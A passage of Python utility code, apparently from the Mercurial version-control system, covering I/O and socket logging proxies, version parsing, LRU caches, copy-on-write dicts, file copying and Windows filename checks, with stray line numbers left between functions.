        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
851
851
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""
    watcher = fileobjectobserver(
        logh, name,
        reads=reads,
        writes=writes,
        logdata=logdata,
        logdataapis=logdataapis)
    return fileobjectproxy(fh, watcher)
859
859
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        # Fixed: this callback was declared without the leading ``res``
        # parameter even though socketproxy._observedcall always invokes
        # observer callbacks as fn(res, *args). The old signature misbound
        # the arguments and supplied four values to a format string with
        # five conversions, raising TypeError whenever state logging fired.
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
976
976
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""
    watcher = socketobserver(
        logh, name,
        reads=reads,
        writes=writes,
        states=states,
        logdata=logdata,
        logdataapis=logdataapis)
    return socketproxy(fh, watcher)
985
985
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # Not running from an installed/built tree.
        return 'unknown'
    return __version__.version
993
993
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part at the first '+' or '-'. The pattern is a
    # raw string now: '[\+-]' relied on '\+' being passed through, which is
    # a deprecated invalid escape sequence in Python 3.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
1062
1062
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # Zero-arg functions: a one-slot list doubles as the "computed yet?"
        # flag and the cached value.
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f

    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def f(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return f
1088
1088
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # Someone else still holds a "copy" of us: give the writer a
            # real copy and drop one shared reference.
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1106
1106
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Drop any existing entry first so a re-set key moves to the end,
        # giving last-set iteration order.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
1131
1131
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    Copies made via copy() share storage with the original until a
    writer calls preparewrite(), which splits off a private dict.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1157
1157
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
1163
1163
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # An exception in the body skips close() so release() aborts;
        # release() runs unconditionally, even if close() itself raises.
        if exc_type is not None:
            self.release()
            return
        try:
            self.close()
        finally:
            self.release()
1188
1188
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            # An intervention is not a failure: commit what we have
            # before propagating it.
            tr.close()
            raise
    finally:
        # Aborts the transaction if close() was never reached.
        tr.release()
1206
1206
@contextlib.contextmanager
def nullcontextmanager():
    """Context manager that does nothing on entry or exit."""
    yield
1210
1210
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # Links are wired up by the owning cache; a fresh node is detached.
        self.prev = self.next = None
        # _notset (module-level sentinel) marks a node with no entry.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1229
1229
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # key -> _lrucachenode mapping; ordering lives in the linked list
        self._cache = {}

        # The list starts as a single node linked to itself; further nodes
        # are allocated lazily by _addcapacity(), up to ``max``.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # A lookup counts as an access: refresh the entry's LRU position.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` or ``default`` on a miss.

        Unlike __getitem__, this does NOT refresh the entry's LRU position.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Empty the cache, keeping the already-allocated node ring."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same entries and ordering."""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1388
1388
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()

    def access(key, compute):
        # On a hit, refresh the key's recency; on a miss, evict the
        # least-recently-used entry once more than 20 results are held,
        # then compute and store the new result.
        if key in cache:
            order.remove(key)
        else:
            if len(cache) > 20:
                del cache[order.popleft()]
            cache[key] = compute()
        order.append(key)
        return cache[key]

    if func.__code__.co_argcount == 1:
        # Fast path: key directly on the single argument, no tuple packing.
        def f(arg):
            return access(arg, lambda: func(arg))
    else:
        def f(*args):
            return access(args, lambda: func(*args))

    return f
1415
1415
class propertycache(object):
    """Non-data descriptor memoizing a method's result on the instance.

    The first attribute access runs ``func`` and stores the result under
    the same name in the instance ``__dict__``, so later accesses find
    the plain attribute and bypass the descriptor entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1428
1428
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # Harmless when the property was never cached on this instance.
    obj.__dict__.pop(prop, None)
1433
1433
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)); defined as 0 for x == 0
        if not x:
            return 0
        bits = -1
        while x:
            x >>= 1
            bits += 1
        return bits

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            continue
        if min < max:
            # Grow the threshold: at least double it, or jump straight to
            # the largest power of two within what was just accumulated,
            # capped at max.
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield ''.join(pending)
1464
1464
def always(fn):
    '''predicate that accepts any input (``fn`` is ignored)'''
    return True
1467
1467
def never(fn):
    '''predicate that rejects any input (``fn`` is ignored)'''
    return False
1470
1470
def nogc(func):
    """Decorator running ``func`` with the cyclic garbage collector off.

    CPython triggers a collection whenever enough container objects have
    been allocated (the threshold from gc.get_threshold()), even when the
    objects are marked as untracked; tracking only affects what the GC
    inspects, not when it runs.  That hurts when building complex (huge)
    containers, so the collector is disabled for the duration of the call
    and its previous state restored afterwards.

    This was improved in CPython 2.7 but still affects its performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()
    return wrapper
1493
1493
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # so leave the collector alone there: make nogc a no-op decorator
    nogc = lambda x: x
1497
1497
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists, so
            # fall back to an absolute path under root
            return os.path.join(root, localpath(n2))
        # make n2 absolute too so both sides share a common prefix
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523
1523
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# point the i18n machinery at the same data directory
i18n.setdatapath(datapath)
1532
1532
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A traceback of exactly one frame means the TypeError came
            # from the call itself (bad arguments), not from inside func.
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) != 1:
                raise
            raise error.SignatureError

    return check
1544
1544
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1560
1560
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        # capture the old stat before unlinking so mtime ambiguity
        # against the replaced file can be detected afterwards
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # recreate the symlink instead of copying its target
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))
1613
1613
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    ``progress`` is invoked as progress(topic, position) and with
    position None once copying finishes.  Returns (hardlink, num): the
    (possibly downgraded) hardlink flag and the number of files copied.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinks when src and dst share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset child progress by files already copied here
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: copy instead and report the downgrade
                # through the returned hardlink flag
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1653
1653
# filenames Windows reserves for devices; checkwinfilename() compares the
# part before the first '.' against these, case-insensitively
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that may not appear anywhere in a Windows filename
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component, accepting either separator
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                # control characters are invalid in Windows filenames
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        # device names like 'con' are reserved regardless of extension
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # note: "n not in '..'" is a substring test, deliberately exempting
        # the special components '.' and '..' from the trailing-char rule
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1706
1706
# Platform-dependent aliases. checkwinfilename is only needed as the OS-level
# check on Windows; other platforms get their own implementation. The timer
# choice follows the historical stdlib convention for each platform.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# Prefer time.perf_counter when the running Python provides it (3.3+): it is
# a high-resolution counter suitable for measuring short durations.
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1716
1716
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # Preferred strategy: a symlink is created atomically and stores the
    # lock payload as its target.
    try:
        return os.symlink(info, pathname)
    except AttributeError: # no symlink in os
        pass
    except OSError as why:
        # An already-existing lock is a hard error for the caller; any
        # other failure (e.g. filesystem without symlink support) falls
        # through to the regular-file strategy below.
        if why.errno == errno.EEXIST:
            raise

    # Fallback: exclusively create a regular file holding the payload.
    openflags = os.O_CREAT | os.O_WRONLY | os.O_EXCL
    openflags |= getattr(os, 'O_BINARY', 0)
    fd = os.open(pathname, openflags)
    os.write(fd, info)
    os.close(fd)
1735
1735
def readlock(pathname):
    """Return the payload stored in a lock file created by makelock()."""
    # Symlink-style lock: the payload is the link target.
    try:
        return os.readlink(pathname)
    except AttributeError: # no symlink in os
        pass
    except OSError as why:
        # EINVAL/ENOSYS mean "this is not a symlink (here)"; fall back to
        # reading the lock as a regular file. Anything else is a real error.
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    fp = posixfile(pathname, 'rb')
    contents = fp.read()
    fp.close()
    return contents
1748
1748
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no fileno(): fall back to stat-ing by name
        return os.stat(fp.name)
    return os.fstat(fd)
1755
1755
1756 # File system features
1756 # File system features
1757
1757
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st = os.lstat(path)
    dirname, basename = os.path.split(path)
    folded = basename.upper()
    if folded == basename:
        folded = basename.lower()
    if folded == basename:
        # the name has no case to fold, so we learn nothing; report
        # case-sensitive (no evidence against it)
        return True
    try:
        st2 = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the folded spelling doesn't resolve: cases are distinct
        return True
    # if the folded spelling reaches the very same entry, the filesystem
    # ignores case
    return st2 != st
1780
1780
# Probe for the optional "re2" regexp bindings. The module-level _re2 flag
# is tri-state: None means re2 imported but not yet sanity-checked, False
# means unavailable, and a true value is set by _re._checkre2() once a test
# match has verified that re2 actually works.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1786
1786
class _re(object):
    """re-module facade that transparently uses re2 when available."""

    def _checkre2(self):
        # Validate that re2 matching really works and record the result in
        # the module-level tri-state flag.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes its flags inline in the pattern rather than as an
            # argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 doesn't support; fall back
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
1829
1829
# Shared instance; callers use util.re.compile()/util.re.escape to pick up
# re2 acceleration transparently when it is available.
re = _re()
1831
1831
# cache of directory listings used by fspath: dir -> {normcased name: name}
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcase-ed entry name -> name as actually stored on disk
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string: the previous code discarded the
    # result, so '\' was consumed as an escape inside the character class
    # below instead of being matched as a separator. Keep the assignment.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1874
1874
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1 = f2 = fp = None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = f1[:-2] + '2~'

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for leftover in (f1, f2):
            if leftover is None:
                continue
            try:
                os.unlink(leftover)
            except OSError:
                pass
1903
1903
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # mirror the short-circuit semantics of "osaltsep and endswith(...)"
    if not pycompat.osaltsep:
        return pycompat.osaltsep
    return path.endswith(pycompat.osaltsep)
1908
1908
def splitpath(path):
    """Split path on os.sep (and os.sep only).

    os.altsep is deliberately ignored: this is meant as a drop-in for a
    plain "path.split(os.sep)". Run os.path.normpath() on the input first
    if normalization is needed.
    """
    return path.split(pycompat.ossep)
1916
1916
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    # create the temp file next to the target so a later rename stays on
